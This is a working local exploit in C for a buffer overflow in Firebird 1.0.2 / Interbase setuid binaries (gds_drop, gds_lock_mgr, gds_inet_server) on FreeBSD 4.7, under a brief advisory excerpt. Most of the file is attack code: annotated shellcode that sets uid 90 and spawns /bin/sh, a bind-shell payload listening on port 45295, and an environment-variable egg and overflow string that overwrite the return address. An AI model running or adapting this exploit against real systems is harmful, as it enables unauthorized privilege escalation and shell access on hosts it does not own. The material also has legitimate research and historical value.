// source: https://www.securityfocus.com/bid/5044/info
Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems.
A buffer overflow has been discovered in the gds_drop program packaged with Interbase. The program copies a caller-controlled string into a fixed-size stack buffer without checking its length (the exploit below supplies it through the INTERBASE environment variable), so a local user can overwrite stack memory, including a function's saved return address, and potentially execute arbitrary code.
Firebird is based on Borland/Inprise Interbase source code and is therefore also prone to this issue.
/* DSR-firebird.c by bob@dtors.net
   -------------------------------

   Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE

   bash-2.05a$ ./DSR-firebird
   ( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
   ( ( by - bob@dtors.net ) )
   ----------------------------------------------------

   Usage: ./DSR-firebird <target#>
   Targets:
   1. [0xbfbff75d] - gds_inet_server
   2. [0xbfbff75c] - gds_lock_mgr
   3. [0xbfbff75e] - gds_drop

   www.dtors.net
   bash-2.05a$

   NOTE: the addresses shown in this sample run differ from the code below,
   which uses 0xbfbff743 for all three targets.  The value is specific to the
   stack layout of the tested build and will need adjusting anywhere else.

   Thanks go to eSDee && ilja for helping me
   with the gds_lock_mgr problems.

   bob@dtors.net
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* execl() -- was used without a prototype */

#define LOCK "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP "/usr/local/firebird/bin/gds_drop"
#define INET "/usr/local/firebird/bin/gds_inet_server"

#define LEN 1056
/*
 * Payload for target 3 (gds_drop): FreeBSD/x86 int 0x80 shellcode that
 * drops to uid 90 (0x5a, the "Setuid [90]" main() announces) and then
 * execs "/bin//sh".  Same bytes as before, regrouped one instruction per
 * line.  Syscall numbers 23/59/1 are FreeBSD's setuid/execve/exit, so this
 * will not run unchanged on Linux.  It contains no NUL byte -- main()
 * measures it with strlen(), so that must stay true if it is edited.
 */
char dropcode[]=
    "\x31\xc0"                      /* xor  eax, eax                  */
    "\x50"                          /* push eax                       */
    "\x6a\x5a"                      /* push 0x5a   (uid 90)           */
    "\x53"                          /* push ebx    (dummy return)     */
    "\xb0\x17"                      /* mov  al, 23  -> setuid         */
    "\xcd\x80"                      /* int  0x80                      */
    "\x31\xc0"                      /* xor  eax, eax                  */
    "\x50"                          /* push eax    (string NUL)       */
    "\x68\x2f\x2f\x73\x68"          /* push "//sh"                    */
    "\x68\x2f\x62\x69\x6e"          /* push "/bin"                    */
    "\x89\xe3"                      /* mov  ebx, esp -> "/bin//sh"    */
    "\x50\x54\x53\x50"              /* push eax, esp, ebx, eax        */
    "\xb0\x3b"                      /* mov  al, 59  -> execve         */
    "\xcd\x80"                      /* int  0x80                      */
    "\x31\xc0\xb0\x01\xcd\x80";     /* exit                           */
/*
 * Payload for target 1 (gds_inet_server).  Byte-for-byte the same as
 * dropcode: setuid(90), execve("/bin//sh"), exit, via FreeBSD/x86 int 0x80.
 * It is deliberately a separate array: main() tells the targets apart by
 * comparing the pointer decide() returns against each array, so folding
 * the two into one would break that dispatch.  NUL-free by design, since
 * main() sizes it with strlen().
 */
char inetcode[]=
    "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"          /* setuid(0x5a)        */
    "\x31\xc0\x50"                                      /* eax = 0; push NUL   */
    "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"  /* ebx -> "/bin//sh"   */
    "\x50\x54\x53\x50\xb0\x3b\xcd\x80"                  /* execve(ebx, ...)    */
    "\x31\xc0\xb0\x01\xcd\x80";                         /* exit                */
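/*
 * Payload for target 2 (gds_lock_mgr): FreeBSD/x86 bind shell.
 *
 * The page render had turned the two inline "//" comments into "file://",
 * which splits the string-literal concatenation and stops this from
 * compiling; they are restored as proper comments here.  The bytes are
 * unchanged (222 of them, no NUL -- main() measures this with strlen()).
 *
 * Flow, as decoded from the bytes (syscall numbers are FreeBSD's):
 *   fork(); setuid(90); socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 *   bind() on port 45295 (the 0xb0 0xef bytes, the port main() prints);
 *   listen(); then loop: accept(), fork(), child dup2()s the client onto
 *   stdin/out/err and execs "/bin//sh", parent close()s and jumps back.
 * The exploit prints "Exploit will hang!" because the exec'd gds_lock_mgr
 * never returns from that accept() loop.
 */
char lockcode[]=
    "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"            /* fork()                            */
    "\x39\xc3\x75\x06\x31\xc0\xb0\x01\xcd\x80"    /* if fork() returned 0: exit        */
    /* setuid[firebird] by bob */
    "\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"    /* setuid(0x5a = 90)                 */
    /* fork() bindshell by eSDee */
    "\x31\xc0\x31\xdb\x53\xb3\x06\x53"            /* push 0, 6 (IPPROTO_TCP)           */
    "\xb3\x01\x53\xb3\x02\x53\x54\xb0"            /* push 1 (SOCK_STREAM), 2 (AF_INET) */
    "\x61\xcd\x80\x89\xc7"                        /* socket(); edi = listening fd      */
    "\x31\xc0\x50\x50\x50"                        /* sockaddr_in: zero padding/addr    */
    "\x66\x68\xb0\xef"                            /* sin_port = 0xb0ef = 45295         */
    "\xb7\x02\x66\x53\x89\xe1"                    /* sin_family = 2; ecx = &sockaddr   */
    "\x31\xdb\xb3\x10\x53\x51\x57\x50"            /* push 16, ecx, edi                 */
    "\xb0\x68\xcd\x80"                            /* bind()                            */
    "\x31\xdb\x39\xc3\x74\x06"                    /* if bind() failed:                 */
    "\x31\xc0\xb0\x01\xcd\x80"                    /*     exit                          */
    "\x31\xc0\x50\x57\x50\xb0\x6a\xcd\x80"        /* listen(edi, 0)                    */
    "\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53"    /* syscall 0x2e with signal 20       */
    "\x89\xe2\x50\x51\x52\xb3\x14\x53\x50"        /*   (SIGCHLD) -- presumably         */
    "\xb0\x2e\xcd\x80"                            /*   sigaction() to reap children    */
    "\x31\xc0\x50\x50\x57\x50\xb0\x1e\xcd\x80"    /* accept(edi, 0, 0)   <-- loop top  */
    "\x89\xc6"                                    /* esi = client fd                   */
    "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"            /* fork()                            */
    "\x39\xc3\x75\x44"                            /* parent: jump to close(esi) below  */
    "\x31\xc0\x57\x50\xb0\x06\xcd\x80"            /* child: close(edi)                 */
    "\x31\xc0\x50\x56\x50\xb0\x5a\xcd\x80"        /* dup2(esi, 0)                      */
    "\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd\x80" /* dup2(esi, 1)                 */
    "\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80"    /* dup2(esi, 2)                      */
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"    /* push "//sh", "/bin"               */
    "\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80" /* execve("/bin//sh")       */
    "\x31\xc0\xb0\x01\xcd\x80"                    /* exit                              */
    "\x31\xc0\x56\x50\xb0\x06\xcd\x80"            /* parent: close(esi)                */
    "\xeb\x9a";                                   /* jmp back to accept()              */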
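/*
 * Map the <target#> command-line argument to its payload.
 *
 * string: argv[1] as typed by the user; "1", "2" or "3".
 * Returns inetcode, lockcode or dropcode -- the array itself, not a copy,
 * because main() identifies the chosen target by comparing the returned
 * pointer against those arrays.
 * Any other value is a usage error: it is reported on stderr and the
 * process exits with status 1 (previously it exited silently with 0,
 * which made a typo look like success to a calling shell).
 */
char *decide(char *string)
{
    if (strcmp(string, "1") == 0)
        return inetcode;
    if (strcmp(string, "2") == 0)
        return lockcode;
    if (strcmp(string, "3") == 0)
        return dropcode;

    fprintf(stderr, "Unknown target '%s': expected 1, 2 or 3\n", string);
    exit(1);
}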
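/*
 * Entry point.  Builds the two environment variables the target reads,
 * then exec()s the chosen setuid Firebird binary:
 *   EGG       = "EGG=" + NOP sled + payload (where execution lands)
 *   INTERBASE = LEN-4 filler bytes + 4-byte return address (the overflow)
 *
 * Fixes over the original:
 *   - buffer was declared [LEN] but written at index LEN -- a one-byte
 *     stack overflow in the exploit itself; it is now LEN + 1.
 *   - the return address was printed with "%x" from an unsigned long
 *     (format/argument mismatch); now "%lx".
 *   - execl() failure (wrong install path, not executable) was silently
 *     reported as success; now perror() + exit status 1.
 *   - the payload length is checked against the egg size before the sled
 *     arithmetic can underflow.
 *
 * argv[1] is the target number, see decide().  Returns 0 only on the
 * (unreachable in practice) path where nothing was exec'd.
 */
int main(int argc, char **argv)
{
    /* Saved-EIP overwrite.  One value for all three targets; it is specific
     * to the FreeBSD 4.7 / Firebird 1.0.2 stack layout this was tested on. */
    unsigned long ret = 0xbfbff743;
    char *selectcode;
    char buffer[LEN + 1];   /* LEN payload bytes + terminating NUL */
    char egg[1024];
    char *ptr;
    const char *target = NULL;
    size_t codelen;
    size_t nops;
    size_t i;

    if (argc < 2) {
        printf("( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )\n");
        printf("( ( by - bob@dtors.net ) )\n");
        printf("----------------------------------------------------\n\n");
        printf("Usage: %s <target#> \n", argv[0]);
        printf("Targets:\n");
        printf("1. [0xbfbff743] - gds_inet_server\n");
        printf("2. [0xbfbff743] - gds_lock_mgr\n");
        printf("3. [0xbfbff743] - gds_drop\n");
        printf("\nwww.dtors.net\n");
        exit(0);
    }

    selectcode = decide(argv[1]);
    codelen = strlen(selectcode);   /* payloads are NUL-free, see the arrays */

    /* The egg holds 1023 bytes of content plus NUL: the sled is sized for
     * that, and "EGG=" is then written over its first four NOPs, so at
     * least four NOPs must exist or the prefix would clobber the payload. */
    if (codelen + 5 > sizeof(egg)) {
        fprintf(stderr, "payload of %lu bytes does not fit the egg\n",
                (unsigned long)codelen);
        return 1;
    }
    nops = sizeof(egg) - codelen - 1;
    ptr = egg;
    for (i = 0; i < nops; i++)
        *ptr++ = 0x90;
    memcpy(ptr, selectcode, codelen);
    egg[sizeof(egg) - 1] = '\0';
    memcpy(egg, "EGG=", 4);
    /* putenv() keeps a pointer to egg itself rather than copying it; that is
     * fine only because we exec() before main() returns. */
    if (putenv(egg) != 0) {
        perror("putenv");
        return 1;
    }

    /* Overflow string: LEN-4 bytes of 'A', then the return address.  The
     * target is 32-bit i386, so exactly four bytes of ret are copied
     * whatever sizeof(unsigned long) is on the build host; on a
     * little-endian host those are the low four bytes, as intended. */
    memset(buffer, 0x41, LEN);
    memcpy(&buffer[LEN - 4], &ret, 4);
    buffer[LEN] = '\0';
    if (setenv("INTERBASE", buffer, 1) != 0) {
        perror("setenv");
        return 1;
    }

    fprintf(stdout, "Return Address: 0x%lx\n", ret);
    fprintf(stdout, "Buffer Size: %d\n", LEN);
    fprintf(stdout, "Setuid [90]\n");

    /* decide() only ever returns one of these three arrays. */
    if (selectcode == inetcode) {
        target = INET;
    } else if (selectcode == lockcode) {
        /* The bind-shell payload never returns from its accept() loop. */
        printf("\nShell is on port 45295\nExploit will hang!\n");
        target = LOCK;
    } else if (selectcode == dropcode) {
        target = DROP;
    }
    if (target == NULL)
        return 0;

    execl(target, target, (char *)NULL);
    /* execl() only returns on failure (e.g. Firebird not at this path). */
    perror(target);
    return 1;
}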